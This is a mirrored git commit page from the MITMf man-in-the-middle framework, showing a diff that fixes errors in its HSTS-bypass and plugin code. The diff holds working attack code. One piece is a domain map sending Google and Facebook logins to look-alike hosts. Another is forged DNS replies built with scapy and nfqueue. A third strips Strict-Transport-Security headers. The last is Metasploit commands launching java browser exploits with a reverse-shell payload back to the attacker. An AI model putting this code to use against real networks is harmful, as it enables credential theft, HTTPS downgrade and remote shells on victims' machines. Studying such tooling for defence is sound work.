mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-11 15:47:10 -07:00
fixed error when loading the css of some websites when using the bypass-hsts option, added some better error handling on plugins
This commit is contained in:
parent
1c3e0554fd
commit
e2132a6ca9
6 changed files with 42 additions and 20 deletions
|
@ -1,7 +1,10 @@
|
|||
#here you can configure your domains to bypass HSTS on
|
||||
#the format is real.domain.com = fake.domain.com
|
||||
|
||||
#for google and gmail
|
||||
accounts.google.com = account.google.com
|
||||
mail.google.com = gmail.google.com
|
||||
www.facebook.com = social.facebook.com
|
||||
accounts.google.se = cuentas.google.se
|
||||
|
||||
#for facebook
|
||||
www.facebook.com = social.facebook.com
|
|
@ -61,7 +61,7 @@ class BeefAutorun(Inject, Plugin):
|
|||
already_hooked = []
|
||||
while True:
|
||||
sessions = beef.sessions_online()
|
||||
if len(sessions) > 0:
|
||||
if sessions is not None and len(sessions) > 0:
|
||||
for session in sessions:
|
||||
|
||||
if session not in already_hooked:
|
||||
|
|
|
@ -142,10 +142,8 @@ class JavaPwn(BrowserProfiler, Plugin):
|
|||
self.injectWait(msf, url, vic_ip)
|
||||
|
||||
else: #here we setup the exploit
|
||||
rand_url = self.rand_url() #generate a random url
|
||||
rand_port = random.randint(1000, 65535) #generate a random port for the payload listener
|
||||
|
||||
|
||||
rand_url = self.rand_url()
|
||||
#generate the command string to send to the virtual console
|
||||
#new line character very important as it simulates a user pressing enter
|
||||
cmd = "use exploit/multi/browser/%s\n" % exploit
|
||||
|
@ -165,10 +163,12 @@ class JavaPwn(BrowserProfiler, Plugin):
|
|||
logging.info("%s >> client is not vulnerable to any java exploit" % vic_ip)
|
||||
logging.info("%s >> falling back to the signed applet attack" % vic_ip)
|
||||
|
||||
rand_url = self.rand_url()
|
||||
|
||||
cmd = "use exploit/multi/browser/java_signed_applet\n"
|
||||
cmd += "set SRVPORT %s\n" % self.msfport
|
||||
cmd += "set URIPATH %s\n" % rand_url
|
||||
cmd += "set PAYLOAD generic/shell_reverse_tcp\n" #chose this payload because it can be upgraded to a full-meterpreter (plus its multi-platform! Yay java!)
|
||||
cmd += "set PAYLOAD generic/shell_reverse_tcp\n"
|
||||
cmd += "set LHOST %s\n" % self.msfip
|
||||
cmd += "set LPORT %s\n" % rand_port
|
||||
cmd += "exploit -j\n"
|
||||
|
|
|
@ -249,13 +249,14 @@ class Spoof(Plugin):
|
|||
|
||||
def resolve_domain(self, domain):
|
||||
try:
|
||||
#logging.info("Resolving -> %s" % domain)
|
||||
answer = dns.resolver.query(domain, 'A')
|
||||
real_ips = []
|
||||
for rdata in answer:
|
||||
real_ips.append(rdata.address)
|
||||
|
||||
if len(real_ips) > 0:
|
||||
return real_ips[0]
|
||||
return real_ips
|
||||
|
||||
except Exception:
|
||||
logging.debug("Error resolving " + domain)
|
||||
|
@ -266,6 +267,7 @@ class Spoof(Plugin):
|
|||
if not pkt.haslayer(DNSQR):
|
||||
payload.set_verdict(nfqueue.NF_ACCEPT)
|
||||
else:
|
||||
#logging.info("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype))
|
||||
if self.dns:
|
||||
for k, v in self.dnscfg.items():
|
||||
if k in pkt[DNSQR].qname:
|
||||
|
@ -277,22 +279,33 @@ class Spoof(Plugin):
|
|||
if v == pkt[DNSQR].qname[:-1]:
|
||||
ip = self.resolve_domain(k)
|
||||
if ip:
|
||||
self.modify_dns(payload, pkt, ip, hsts=True)
|
||||
self.modify_dns(payload, pkt, ip)
|
||||
|
||||
if 'wwww' in pkt[DNSQR].qname:
|
||||
ip = self.resolve_domain(pkt[DNSQR].qname[1:-1])
|
||||
if ip:
|
||||
self.modify_dns(payload, pkt, ip, hsts=True)
|
||||
self.modify_dns(payload, pkt, ip)
|
||||
|
||||
def modify_dns(self, payload, pkt, ip, hsts=False):
|
||||
if 'web' in pkt[DNSQR].qname:
|
||||
ip = self.resolve_domain(pkt[DNSQR].qname[3:-1])
|
||||
if ip:
|
||||
self.modify_dns(payload, pkt, ip)
|
||||
|
||||
def modify_dns(self, payload, pkt, ip):
|
||||
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\
|
||||
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\
|
||||
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=ip))
|
||||
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd)
|
||||
|
||||
if self.hsts:
|
||||
spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip[0]); del ip[0] #have to do this first to initialize the an field
|
||||
for i in ip:
|
||||
spoofed_pkt[DNS].an.add_payload(DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=i))
|
||||
|
||||
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))
|
||||
if hsts:
|
||||
logging.info("%s Resolving %s for HSTS bypass" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
|
||||
else:
|
||||
|
||||
if self.dns:
|
||||
spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip)
|
||||
logging.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
|
||||
|
||||
def start_dns_queue(self):
|
||||
|
@ -343,8 +356,11 @@ class Spoof(Plugin):
|
|||
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
|
||||
|
||||
if (self.dns or self.hsts):
|
||||
try:
|
||||
self.q.unbind(socket.AF_INET)
|
||||
self.q.close()
|
||||
except:
|
||||
pass
|
||||
|
||||
if self.arp:
|
||||
print '[*] Re-arping network'
|
||||
|
|
|
@ -100,6 +100,9 @@ class ServerConnection(HTTPClient):
|
|||
if (value.find('gzip') != -1):
|
||||
logging.debug("Response is compressed...")
|
||||
self.isCompressed = True
|
||||
if (key.lower() == 'strict-transport-security'):
|
||||
value = 'max-age=0'
|
||||
|
||||
elif (key.lower() == 'content-length'):
|
||||
self.contentLength = value
|
||||
elif (key.lower() == 'set-cookie'):
|
||||
|
|
|
@ -71,7 +71,7 @@ class URLMonitor:
|
|||
else:
|
||||
self.sustitucion[host] = "web"+host
|
||||
self.real["web"+host] = host
|
||||
logging.debug("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
|
||||
#logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
|
||||
|
||||
url = 'http://' + host + path
|
||||
#logging.debug("LEO stripped URL: %s %s"%(client, url))
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue